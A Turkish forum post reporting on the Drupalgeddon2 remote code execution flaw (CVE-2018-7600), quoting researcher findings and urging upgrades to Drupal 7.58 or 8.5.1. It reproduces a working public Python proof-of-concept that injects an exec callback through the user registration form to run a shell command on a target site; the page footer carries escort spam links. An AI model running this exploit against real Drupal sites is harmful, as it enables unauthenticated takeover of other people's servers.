Portalforum.Net   Forum Kimler Online Yöneticiler Duyurular Anasayfa

Geri Git   Portalforum.Net > >

Cevapla
 
Seçenekler Stil
  #1  
Alt 06.Ocak.2019, 04:47
Syst3m Syst3m isimli Üye şimdilik offline konumundadır
Kurucu Admin
 
Üyelik tarihi: 03.Aralık.2018
Mesajlar: 58
Standart Drupal’da bulunan RCE için exploit yayınlandı



Hacker’ların Drupal üzerinden bulunan RCE (Remote Command Execution) güvenlik açığı için kullanılan exploit’i yayınlamasından bu yana Drupal sistemlerine yapılan saldırılara inanılmaz bir miktarda artış var.

İki hafta önce yaklaşık olarak, Drupal güvenlik ekibi saldırganların savunmasız web sitelerini tamamen ele geçirmelerine olanak sağlayan Durpalgeddon2 adı verilen son derece kritik bir RCE güvenlik açığı keşfedildi.

Şirket bu güvenlik açığını gidermek için, Drupal CMS’in güncel sürümünü yayınladı ve bir milyondan fazla Drupal kullanılan sitenin saldırıya maruz kalmasını engelledi. Şirket bu güncellemeyi yaparken sistem üzerinden bulunan güvenlik açığı hakkında herhangi bir teknik yazı yayınlamadı.

İki gün önce, Check Point ve Dofinity‘deki güvenlik araştırmacıları, bu güvenlik açığına (CVE-2018-7600) ilişkin teknik detayları yayınladılar. Bu teknik yazıda, bir Rus güvenlik araştırmacısı, GitHub’da Drupalgeddon2 için bir Proof of Concept (PoC) istismar kodu yayınladı.

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

#!/usr/bin/env
import sys
import requests

print (‘################################################ ################’)
print (‘# Proof-Of-Concept for CVE-2018-7600’)
print (‘# by Vitalii Rudnykh’)
print (‘# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders’)
print (‘# https://github.com/a2u/CVE-2018-7600’)
print (‘################################################ ################’)
print (‘Provided only for educational or information purposes\n’)

target = input(‘Enter target url (example: https://domain.ltd/): ‘)

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {‘http’: ‘http://127.0.0.1:8080’, ‘https’: ‘http://127.0.0.1:8080’}
# verify = False
proxies = {}
verify = True

url = target + ‘user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax’
payload = {‘form_id’: ‘user_register_form’, ‘_drupal_ajax’: ‘1’, ‘mail[#post_render][]’: ‘exec’, ‘mail[#type]’: ‘markup’, ‘mail[#markup]’: ‘echo “;-)” | tee hello.txt’}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
if r.status_code != 200:
sys.exit(“Not exploitable”)
print (‘\nCheck: ‘+target+’hello.txt’)

Drupal’ın 6’dan 8’e kadar olan tüm sürümlerini etkileyen Drupalgeddon2 güvenlik açığı, saldırganların uzaktan kötü amaçlı kod çalıştırmalarına olanak sağlıyor.

Checkpoint’in açıklamasına göre, Form API (FAPI) AJAX istekleri yoluyla iletilen girdilerin yeterli önlem alınmamasıdan ötürü güvenlik açığı oluşuyor.

Check Point araştırmacıları, “Sonuç olarak, saldırganın iç form yapısına zararlı bir dosya veya kod parçası enjekte etmesini sağlıyor. Bu, Drupal üzerinde kimlik doğrulaması olmadan çalıştırılmasına olanak tanıyor.” dedi ve ekledi “Bu güvenlik açığından yararlanarak, bir saldırgan herhangi bir Drupal tabanlı bir siteyi tamamen ele geçirmesini sağlıyor.”.

Birçok kişi tarafından doğru ve ektili olarak çalıştığı söylenen PoC kodunun herkese açılmasından kısa bir süre sonra, Sucuri, Imperva ve SANS Internet Storm Center araştırmacıları Drupalgeddon2’yi kullanarak Drupal sitelere yönelik saldırıların başladığını gözlemlemeye başladılar ancak hiçbiri henüz saldırılara ilişkin bir rapor yayınlamadı.

Drupal’ın savunmasız sürümlerini kullanan site yöneticilerinin, CMS’yi Drupal 7.58‘e veya Drupal 8.5.1‘e en kısa sürede güncelleştirerek bu güvenlik açığını yamalamaları önerilir.

Güvenlik açığı, Şubat 2016’dan bu yana artık şirket tarafından desteklenmeyen Drupal 6’yı da etkiliyor, ancak bu sürüm için de bir yama oluşturuldu.
Alıntı ile Cevapla

Syst3m Kullanicisinin Son 5 Konusu
Baslik Kategori Son Yazan Cevaplar Okunma Son Mesaj
Türkiye’nin Her Yerinden Sesli Sohbet Arkadaşları... Son Dakika Haberleri Syst3m 0 531 01.Eylül.2020 18:41
Online Sohbet Odalarına Telefondan Giriş Yap Son Dakika Haberleri Syst3m 0 875 01.Eylül.2020 15:10
Adwords Cloaker Son Dakika Haberleri Syst3m 0 681 18.Ağustos.2020 16:43
Yeniliklerle Dolu Mynet Sohbet Odaları Son Dakika Haberleri Syst3m 0 570 13.Mart.2020 11:40
Google Pingleme servisleri Hakkinda İnternet Dünyası Syst3m 1 6842 13.Mart.2020 11:29

Cevapla

Etiketler
açığı, bir, bulunan, drupal, drupal’da, exploit, güvenlik, için, print, rce, yayınlandı

Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB kodu Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı

Forum Jump


Tüm Zamanlar GMT Olarak Ayarlanmış. Şuanki Zaman: 19:51.


Search Engine Optimisation provided by DragonByte SEO v2.0.36 (Lite) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
ankara escort ankara escort ankara escort çankaya escort ankara otele gelen escort eryaman escort eryaman escort ankara escort eryaman escort kızılay escort escort ankara çankaya escort kızılay escort ankara eskort Antalya Seo tesbih
escort bayan mersin escort alanya eskort